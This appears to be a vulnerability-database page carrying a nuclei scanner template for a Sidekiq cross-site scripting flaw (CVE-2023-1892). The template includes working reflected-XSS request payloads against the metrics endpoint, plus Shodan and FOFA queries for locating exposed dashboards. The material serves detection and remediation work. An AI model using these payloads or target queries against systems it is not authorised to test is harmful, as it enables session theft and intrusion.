Lucene search
K

Sidekiq < 7.0.8 - Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

Sidekiq < 7.0.8 - XSS vulnerability in admin panel can pose serious risks

Related
Refs
Code
id: CVE-2023-1892

info:
  name: Sidekiq < 7.0.8 - Cross-Site Scripting
  author: ritikchaddha,princechaddha
  severity: critical
  description: |
    An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the period parameter in Sidekiq metrics endpoints, potentially stealing administrator session cookies and accessing sensitive job queue information and worker statistics.
  remediation: |
    Update Sidekiq to version 7.0.8 or later that properly sanitizes the period parameter and encodes output in the metrics dashboard.
  reference:
    - https://huntr.com/bounties/e35e5653-c429-4fb8-94a3-cbc123ae4777
    - https://github.com/sidekiq/sidekiq/commit/458fdf74176a9881478c48dc5cf0269107b22214
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1892
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
    cvss-score: 9.6
    cve-id: CVE-2023-1892
    cwe-id: CWE-79
    epss-score: 0.02742
    epss-percentile: 0.84365
    cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    vendor: contribsys
    product: sidekiq
    shodan-query: http.title:"sidekiq"
    fofa-query:
      - title="Sidekiq"
      - title="sidekiq"
    google-query: intitle:"sidekiq"
  tags: cve,cve2023,sidekiq,contribsys,xss,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/queues"

    matchers:
      - type: word
        internal: true
        part: body
        words:
          - "Sidekiq"
          - "Dashboard</a>"
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"
      - "{{BaseURL}}/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"
      - "{{BaseURL}}/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img/src/onerror=alert(document.domain)>"

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100da1442e8a6dcaaeb402cde35579f706f75ebe2c64bb00094de27cf2ce3a28ce002201323c365bdd3a87020aa51aa65b4c8f39b8cbdefe752bc319799d29a09bac7fb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.6
CVSS 38.3
EPSS0.02742
SSVC
30